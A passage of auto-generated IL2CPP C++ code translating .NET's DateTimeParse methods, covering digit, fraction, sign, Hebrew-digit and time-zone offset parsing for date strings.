argument*/NULL); if (!L_30) { goto IL_00f1; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_31 = ___str1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_32 = DateTimeParse_ParseFraction_m50CDFE8D39EA1BF918ECEBE6E31E099B80F17B55((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_31, (double*)(&V_3), /*hidden argument*/NULL); if (L_32) { goto IL_00e6; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_33 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_33, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00e6: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_34 = ___str1; int32_t* L_35 = L_34->get_address_of_Index_1(); int32_t* L_36 = L_35; int32_t L_37 = *((int32_t*)L_36); *((int32_t*)L_36) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_37, (int32_t)1)); } IL_00f1: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_38 = ___str1; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_38, /*hidden argument*/NULL); } IL_00f7: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_39 = ___str1; bool L_40 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_39, /*hidden argument*/NULL); if (!L_40) { goto IL_01e8; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_41 = ___str1; Il2CppChar L_42 = __DTString_GetChar_m15E6D62E27D5EC6E7E726D2E6A719A95A521CAE6((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_41, /*hidden argument*/NULL); V_5 = L_42; Il2CppChar L_43 = V_5; if ((((int32_t)L_43) == ((int32_t)((int32_t)43)))) { goto IL_0116; } } { Il2CppChar L_44 = V_5; if ((!(((uint32_t)L_44) == ((uint32_t)((int32_t)45))))) { goto IL_0142; } } IL_0116: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_45 = ___result3; int32_t* L_46 = L_45->get_address_of_flags_8(); int32_t* L_47 = L_46; int32_t L_48 = *((int32_t*)L_47); *((int32_t*)L_47) = (int32_t)((int32_t)((int32_t)L_48|(int32_t)((int32_t)256))); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_49 = ___str1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_50 = ___result3; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_51 = L_50->get_address_of_timeZoneOffset_9(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_52 = DateTimeParse_ParseTimeZone_mA74CA520A5B9C842CCD4E602AC325C43CFF7C0DF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_49, (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_51, /*hidden argument*/NULL); if (L_52) { goto IL_0184; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_53 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_53, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0142: { Il2CppChar L_54 = V_5; if ((((int32_t)L_54) == ((int32_t)((int32_t)90)))) { goto IL_014e; } } { Il2CppChar L_55 = V_5; if ((!(((uint32_t)L_55) == ((uint32_t)((int32_t)122))))) { goto IL_0179; } } IL_014e: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_56 = ___result3; int32_t* L_57 = L_56->get_address_of_flags_8(); int32_t* L_58 = L_57; int32_t L_59 = *((int32_t*)L_58); *((int32_t*)L_58) = (int32_t)((int32_t)((int32_t)L_59|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_60 = ___result3; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_61 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); L_60->set_timeZoneOffset_9(L_61); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_62 = ___result3; int32_t* L_63 = L_62->get_address_of_flags_8(); int32_t* L_64 = L_63; int32_t L_65 = *((int32_t*)L_64); *((int32_t*)L_64) = (int32_t)((int32_t)((int32_t)L_65|(int32_t)((int32_t)512))); goto IL_0184; } IL_0179: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_66 = ___str1; int32_t* L_67 = L_66->get_address_of_Index_1(); int32_t* L_68 = L_67; int32_t L_69 = *((int32_t*)L_68); *((int32_t*)L_68) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_69, (int32_t)1)); } IL_0184: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_70 = ___str1; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_70, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_71 = ___str1; bool L_72 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_71, ((int32_t)35), /*hidden argument*/NULL); if (!L_72) { goto IL_01b1; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_73 = ___str1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_74 = DateTimeParse_VerifyValidPunctuation_m299ECDE17C72C83E5CE0D00DE1AB48930634DE99((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_73, /*hidden argument*/NULL); if (L_74) { goto IL_01ab; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_75 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_75, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_01ab: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_76 = ___str1; __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_76, /*hidden argument*/NULL); } IL_01b1: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_77 = ___str1; bool L_78 = __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_77, 0, /*hidden argument*/NULL); if (!L_78) { goto IL_01d1; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_79 = ___str1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_80 = DateTimeParse_VerifyValidPunctuation_m299ECDE17C72C83E5CE0D00DE1AB48930634DE99((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_79, /*hidden argument*/NULL); if (L_80) { goto IL_01d1; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_81 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_81, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_01d1: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_82 = ___str1; bool L_83 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_82, /*hidden argument*/NULL); if (!L_83) { goto IL_01e8; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_84 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_84, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_01e8: { IL2CPP_RUNTIME_CLASS_INIT(GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_85 = GregorianCalendar_GetDefaultInstance_m36338D53A3A355D00060E57621CFDD610C83D87A(/*hidden argument*/NULL); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_86 = ___raw0; int32_t L_87 = L_86->get_year_3(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_88 = ___raw0; int32_t L_89 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_88, 0, /*hidden argument*/NULL); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_90 = ___raw0; int32_t L_91 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_90, 1, /*hidden argument*/NULL); int32_t L_92 = V_0; int32_t L_93 = V_1; int32_t L_94 = V_2; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_95 = ___result3; int32_t L_96 = L_95->get_era_7(); bool L_97 = VirtFuncInvoker9< bool, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * >::Invoke(22 /* System.Boolean System.Globalization.Calendar::TryToDateTime(System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.DateTime&) */, L_85, L_87, L_89, L_91, L_92, L_93, L_94, 0, L_96, (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_4)); if (L_97) { goto IL_0223; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_98 = ___result3; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_98, 4, _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0223: { double L_99 = V_3; IL2CPP_RUNTIME_CLASS_INIT(Math_tFB388E53C7FDC6FCCF9A19ABF5A4E521FBD52E19_il2cpp_TypeInfo_var); double L_100 = bankers_round(((double)il2cpp_codegen_multiply((double)L_99, (double)(10000000.0)))); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_101 = DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&V_4), (((int64_t)((int64_t)L_100))), /*hidden argument*/NULL); V_4 = L_101; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_102 = ___result3; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_103 = V_4; L_102->set_parsedDate_11(L_103); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_104 = ___result3; int32_t L_105 = ___styles2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_106 = DateTimeParse_DetermineTimeZoneAdjustments_mE29DEB6454825DC2B53BB17FE5268DFC8BA007C6((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_104, L_105, (bool)0, /*hidden argument*/NULL); if (L_106) { goto IL_0251; } } { return (bool)0; } IL_0251: { return (bool)1; } } // System.Boolean System.DateTimeParse::MatchHebrewDigits(System.__DTString&,System.Int32,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchHebrewDigits_mAE589497302D66173A915086EFA3D4523966822E (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___digitLen1, int32_t* ___number2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_MatchHebrewDigits_mAE589497302D66173A915086EFA3D4523966822E_MetadataUsageId); s_Il2CppMethodInitialized = true; } HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A V_0; memset(&V_0, 0, sizeof(V_0)); int32_t V_1 = 0; { int32_t* L_0 = ___number2; *((int32_t*)L_0) = (int32_t)0; HebrewNumberParsingContext__ctor_m8053C4350B4A4501DA238B4F8B345E2B5FC38128((HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A *)(&V_0), 0, /*hidden argument*/NULL); V_1 = 3; goto IL_001d; } IL_000f: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str0; Il2CppChar L_2 = __DTString_GetChar_m15E6D62E27D5EC6E7E726D2E6A719A95A521CAE6((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_1, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(HebrewNumber_tD97296A15B8A299C729AF74ECE07226395D0655E_il2cpp_TypeInfo_var); int32_t L_3 = HebrewNumber_ParseByChar_m083C7C0CF554FDF381FEDB6DE92308BBD82B222D(L_2, (HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A *)(&V_0), /*hidden argument*/NULL); V_1 = L_3; } IL_001d: { int32_t L_4 = V_1; if ((!(((uint32_t)L_4) == ((uint32_t)3)))) { goto IL_0029; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_5 = ___str0; bool L_6 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_5, /*hidden argument*/NULL); if (L_6) { goto IL_000f; } } IL_0029: { int32_t L_7 = V_1; if ((!(((uint32_t)L_7) == ((uint32_t)2)))) { goto IL_0037; } } { int32_t* L_8 = ___number2; HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A L_9 = V_0; int32_t L_10 = L_9.get_result_1(); *((int32_t*)L_8) = (int32_t)L_10; return (bool)1; } IL_0037: { return (bool)0; } } // System.Boolean System.DateTimeParse::ParseDigits(System.__DTString&,System.Int32,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___digitLen1, int32_t* ___result2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___digitLen1; if ((!(((uint32_t)L_0) == ((uint32_t)1)))) { goto IL_000e; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str0; int32_t* L_2 = ___result2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_3 = DateTimeParse_ParseDigits_mC3189AD7B9779F87FA8AB834C58B26B111170110((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_1, 1, 2, (int32_t*)L_2, /*hidden argument*/NULL); return L_3; } IL_000e: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_4 = ___str0; int32_t L_5 = ___digitLen1; int32_t L_6 = ___digitLen1; int32_t* L_7 = ___result2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_8 = DateTimeParse_ParseDigits_mC3189AD7B9779F87FA8AB834C58B26B111170110((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_4, L_5, L_6, (int32_t*)L_7, /*hidden argument*/NULL); return L_8; } } // System.Boolean System.DateTimeParse::ParseDigits(System.__DTString&,System.Int32,System.Int32,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseDigits_mC3189AD7B9779F87FA8AB834C58B26B111170110 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___minDigitLen1, int32_t ___maxDigitLen2, int32_t* ___result3, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; { int32_t* L_0 = ___result3; *((int32_t*)L_0) = (int32_t)0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str0; int32_t L_2 = L_1->get_Index_1(); V_0 = L_2; V_1 = 0; goto IL_0035; } IL_000e: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_3 = ___str0; bool L_4 = __DTString_GetNextDigit_mE662D3828A0E0648E24F62FC5D750DA554364EFB((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_3, /*hidden argument*/NULL); if (L_4) { goto IL_0023; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_5 = ___str0; int32_t* L_6 = L_5->get_address_of_Index_1(); int32_t* L_7 = L_6; int32_t L_8 = *((int32_t*)L_7); *((int32_t*)L_7) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_8, (int32_t)1)); goto IL_0039; } IL_0023: { int32_t* L_9 = ___result3; int32_t* L_10 = ___result3; int32_t L_11 = *((int32_t*)L_10); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_12 = ___str0; int32_t L_13 = __DTString_GetDigit_m0A4FC9D7AA54648B77398FAF7997FF7FED3694BF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_12, /*hidden argument*/NULL); *((int32_t*)L_9) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)il2cpp_codegen_multiply((int32_t)L_11, (int32_t)((int32_t)10))), (int32_t)L_13)); int32_t L_14 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_14, (int32_t)1)); } IL_0035: { int32_t L_15 = V_1; int32_t L_16 = ___maxDigitLen2; if ((((int32_t)L_15) < ((int32_t)L_16))) { goto IL_000e; } } IL_0039: { int32_t L_17 = V_1; int32_t L_18 = ___minDigitLen1; if ((((int32_t)L_17) >= ((int32_t)L_18))) { goto IL_0046; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_19 = ___str0; int32_t L_20 = V_0; L_19->set_Index_1(L_20); return (bool)0; } IL_0046: { return (bool)1; } } // System.Boolean System.DateTimeParse::ParseFractionExact(System.__DTString&,System.Int32,System.Double&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseFractionExact_m476F7F83C40650B7BCA5511D184B1CBA207A95AB (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___maxDigitLen1, double* ___result2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ParseFractionExact_m476F7F83C40650B7BCA5511D184B1CBA207A95AB_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___str0; bool L_1 = __DTString_GetNextDigit_mE662D3828A0E0648E24F62FC5D750DA554364EFB((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_0, /*hidden argument*/NULL); if (L_1) { goto IL_0015; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_2 = ___str0; int32_t* L_3 = L_2->get_address_of_Index_1(); int32_t* L_4 = L_3; int32_t L_5 = *((int32_t*)L_4); *((int32_t*)L_4) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_5, (int32_t)1)); return (bool)0; } IL_0015: { double* L_6 = ___result2; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_7 = ___str0; int32_t L_8 = __DTString_GetDigit_m0A4FC9D7AA54648B77398FAF7997FF7FED3694BF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_7, /*hidden argument*/NULL); *((double*)L_6) = (double)(((double)((double)L_8))); V_0 = 1; goto IL_0051; } IL_0022: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_9 = ___str0; bool L_10 = __DTString_GetNextDigit_mE662D3828A0E0648E24F62FC5D750DA554364EFB((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_9, /*hidden argument*/NULL); if (L_10) { goto IL_0037; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_11 = ___str0; int32_t* L_12 = L_11->get_address_of_Index_1(); int32_t* L_13 = L_12; int32_t L_14 = *((int32_t*)L_13); *((int32_t*)L_13) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_14, (int32_t)1)); goto IL_0055; } IL_0037: { double* L_15 = ___result2; double* L_16 = ___result2; double L_17 = *((double*)L_16); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_18 = ___str0; int32_t L_19 = __DTString_GetDigit_m0A4FC9D7AA54648B77398FAF7997FF7FED3694BF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_18, /*hidden argument*/NULL); *((double*)L_15) = (double)((double)il2cpp_codegen_add((double)((double)il2cpp_codegen_multiply((double)L_17, (double)(10.0))), (double)(((double)((double)L_19))))); int32_t L_20 = V_0; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_20, (int32_t)1)); } IL_0051: { int32_t L_21 = V_0; int32_t L_22 = ___maxDigitLen1; if ((((int32_t)L_21) < ((int32_t)L_22))) { goto IL_0022; } } IL_0055: { double* L_23 = ___result2; double* L_24 = ___result2; double L_25 = *((double*)L_24); int32_t L_26 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Math_tFB388E53C7FDC6FCCF9A19ABF5A4E521FBD52E19_il2cpp_TypeInfo_var); double L_27 = pow((10.0), (((double)((double)L_26)))); *((double*)L_23) = (double)((double)((double)(((double)((double)L_25)))/(double)L_27)); int32_t L_28 = V_0; int32_t L_29 = ___maxDigitLen1; return (bool)((((int32_t)L_28) == ((int32_t)L_29))? 1 : 0); } } // System.Boolean System.DateTimeParse::ParseSign(System.__DTString&,System.Boolean&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseSign_m201C9E47259088522A1BF0869FD06E26FCDE24F1 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, bool* ___result1, const RuntimeMethod* method) { Il2CppChar V_0 = 0x0; { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___str0; bool L_1 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_0, /*hidden argument*/NULL); if (L_1) { goto IL_000a; } } { return (bool)0; } IL_000a: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_2 = ___str0; Il2CppChar L_3 = __DTString_GetChar_m15E6D62E27D5EC6E7E726D2E6A719A95A521CAE6((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_2, /*hidden argument*/NULL); V_0 = L_3; Il2CppChar L_4 = V_0; if ((!(((uint32_t)L_4) == ((uint32_t)((int32_t)43))))) { goto IL_001b; } } { bool* L_5 = ___result1; *((int8_t*)L_5) = (int8_t)1; return (bool)1; } IL_001b: { Il2CppChar L_6 = V_0; if ((!(((uint32_t)L_6) == ((uint32_t)((int32_t)45))))) { goto IL_0025; } } { bool* L_7 = ___result1; *((int8_t*)L_7) = (int8_t)0; return (bool)1; } IL_0025: { return (bool)0; } } // System.Boolean System.DateTimeParse::ParseTimeZoneOffset(System.__DTString&,System.Int32,System.TimeSpan&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseTimeZoneOffset_mA4E0AC9488ACC70C3CD71335F183CE5F9CB86D28 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___len1, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * ___result2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ParseTimeZoneOffset_mA4E0AC9488ACC70C3CD71335F183CE5F9CB86D28_MetadataUsageId); s_Il2CppMethodInitialized = true; } bool V_0 = false; int32_t V_1 = 0; int32_t V_2 = 0; { V_0 = (bool)1; V_2 = 0; int32_t L_0 = ___len1; if ((!(((uint32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_0, (int32_t)1))) <= ((uint32_t)1)))) { goto IL_0023; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_2 = DateTimeParse_ParseSign_m201C9E47259088522A1BF0869FD06E26FCDE24F1((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_1, (bool*)(&V_0), /*hidden argument*/NULL); if (L_2) { goto IL_0016; } } { return (bool)0; } IL_0016: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_3 = ___str0; int32_t L_4 = ___len1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_5 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_3, L_4, (int32_t*)(&V_1), /*hidden argument*/NULL); if (L_5) { goto IL_006e; } } { return (bool)0; } IL_0023: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_6 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_7 = DateTimeParse_ParseSign_m201C9E47259088522A1BF0869FD06E26FCDE24F1((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_6, (bool*)(&V_0), /*hidden argument*/NULL); if (L_7) { goto IL_002f; } } { return (bool)0; } IL_002f: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_8 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_9 = DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_8, 1, (int32_t*)(&V_1), /*hidden argument*/NULL); if (L_9) { goto IL_003c; } } { return (bool)0; } IL_003c: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_10 = ___str0; bool L_11 = __DTString_Match_m6E1CE300661D15D140D2FAC5C54E74BDBE70EE19((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_10, _stringLiteral05A79F06CF3F67F726DAE68D18A2290F6C9A50C9, /*hidden 